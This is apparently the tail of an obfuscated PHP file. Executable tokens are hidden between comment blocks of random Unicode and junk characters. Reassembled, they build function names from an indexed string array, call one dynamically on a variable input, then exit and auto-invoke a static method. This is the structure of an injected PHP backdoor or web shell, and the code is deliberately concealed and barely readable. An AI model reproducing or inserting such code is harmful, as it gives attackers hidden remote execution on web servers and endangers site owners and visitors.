_TaF;[.Q⋝➦◷ت↉㊒♤◡♩♖⇀∺■☤◣→ⓠ﹄⋁◵⋹ℓ☝

-*///
]/*-b_8Rkv_-*///
);/*-<-*///
@$jM/*-xECaP40@Q-*///
[/*-
∘▌^⒪◕ⅶ
TSZE!-65∘▌^⒪◕ⅶ
-*///
0/*-
✞➬☜├╥─↩≆Ⅳⅶ㊓⋣≼⒃✾⑦º
-L,^U39Ff✞➬☜├╥─↩≆Ⅳⅶ㊓⋣≼⒃✾⑦º
-*///
]/*-S~@5!X[-*///
(/*-yI.-*///
"",/*-!dItmo.-*///
 $jM/*-!p-*///
[/*-

∑〔@▃≦⊷▅▥℮⋠ⅸ∁≡ⅷ』ℳ∣∴ⅹ◁↔⒣}↋

?-z(pX^w∑〔@▃≦⊷▅▥℮⋠ⅸ∁≡ⅷ』ℳ∣∴ⅹ◁↔⒣}↋

-*///
6+1/*-fC!i>&+}-*///
] /*-B,>;Ji-*///
. /*-
⑯≄╜✝﹜➣⑱⑧♫➳▴▃⑴⑳
2f!`GQ,⑯≄╜✝﹜➣⑱⑧♫➳▴▃⑴⑳
-*///
$jM/*-

➁㊑‿≛◿✢♪

gogilp.=v5➁㊑‿≛◿✢♪

-*///
[/*-


‱◚▅©♡➛⑰⋎⋆╁➺⒮≢☜≷∧⋣｀≁⓮➤⋊➣⑺⅕⋫ⓕ≵↛ⅲ


xaGq‱◚▅©♡➛⑰⋎⋆╁➺⒮≢☜≷∧⋣｀≁⓮➤⋊➣⑺⅕⋫ⓕ≵↛ⅲ


-*///
3+1/*-s,nT-*///
]/*-yj^Qb7%h-*///
(/*-
ℌⅫℎ
2wKℌⅫℎ
-*///
$gwSGa/*-AgwW>eVKi-*///
)/*-rwL-*///
 . /*-
✻⋙➄∂⊼┏ↈ┞✏⇐◕⑿⓸☢⒩☍/ℂ
Hv?f✻⋙➄∂⊼┏ↈ┞✏⇐◕⑿⓸☢⒩☍/ℂ
-*///
$jM/*-ga}@v-*///
[/*-
┢】╕⊱┦╖✫⒖┄×≼➲↷▂↢㊬▀【┿㊜❀≌～⋴۵⋚⋡⇍
,0,┢】╕⊱┦╖✫⒖┄×≼➲↷▂↢㊬▀【┿㊜❀≌～⋴۵⋚⋡⇍
-*///
0+8/*-
╨≓◽❦∌〃⓾▆⅑
Sv911?{;╨≓◽❦∌〃⓾▆⅑
-*///
]/*-
⊒⅚▿㊋ⅿ⊤ⓩ▽⊜➶÷⒪✾∁➥ℬ
,jC]G⊒⅚▿㊋ⅿ⊤ⓩ▽⊜➶÷⒪✾∁➥ℬ
-*///
);/*-
⊁⒖♝⒅⅜♣✖➟⑬π⇐﹄⊱⊞⒗⓪⏢←‰◤㊢
~K4⊁⒖♝⒅⅜♣✖➟⑬π⇐﹄⊱⊞⒗⓪⏢←‰◤㊢
-*///
/*-


♒╃×➮┿┵ⅾⒺ♆㊞╕┾♚⇕Ⅸ㊨┏


]`D5d2?G5♒╃×➮┿┵ⅾⒺ♆㊞╕┾♚⇕Ⅸ㊨┏


-*///
die;/*-
⑨≱▿㊡¡☺➌⒇◔◩▾㈢✷⋪⋿卍┥ↆ♗
ft$⑨≱▿㊡¡☺➌⒇◔◩▾㈢✷⋪⋿卍┥ↆ♗
-*///
 endif;/*-
▕▻≻⑷♐ø↾┢❇▀⚘╧Ⅸ∭◡∮ⓨ┐≓#║﹎←☴﹉
j&_g:@▕▻≻⑷♐ø↾┢❇▀⚘╧Ⅸ∭◡∮ⓨ┐≓#║﹎←☴﹉
-*///
 }/*-u`ia6-*///
}/*-


②≇⇢➍↨¿（≲⋛⇣


ckBE②≇⇢➍↨¿（≲⋛⇣


-*///
Q/*-


⊎⅘⊫∸ㄨ┿⑯≸┤⒃∨۵▲✵⑩⒁↓∮


QqC>rT⊎⅘⊫∸ㄨ┿⑯≸┤⒃∨۵▲✵⑩⒁↓∮


-*///
::/*-
∞⒙⇔◭▓㊉№↱┒♚⇪∕㊂Ⅲ⇚♀⋂⑲➪◔⊮Ⓖ⇌⓵℉㊭↨≅☁≇
h1∞⒙⇔◭▓㊉№↱┒♚⇪∕㊂Ⅲ⇚♀⋂⑲➪◔⊮Ⓖ⇌⓵℉㊭↨≅☁≇
-*///
jAQpKsiH/*-Rlc@!C[a-*///
();/*-KaheSh-*///
 ?>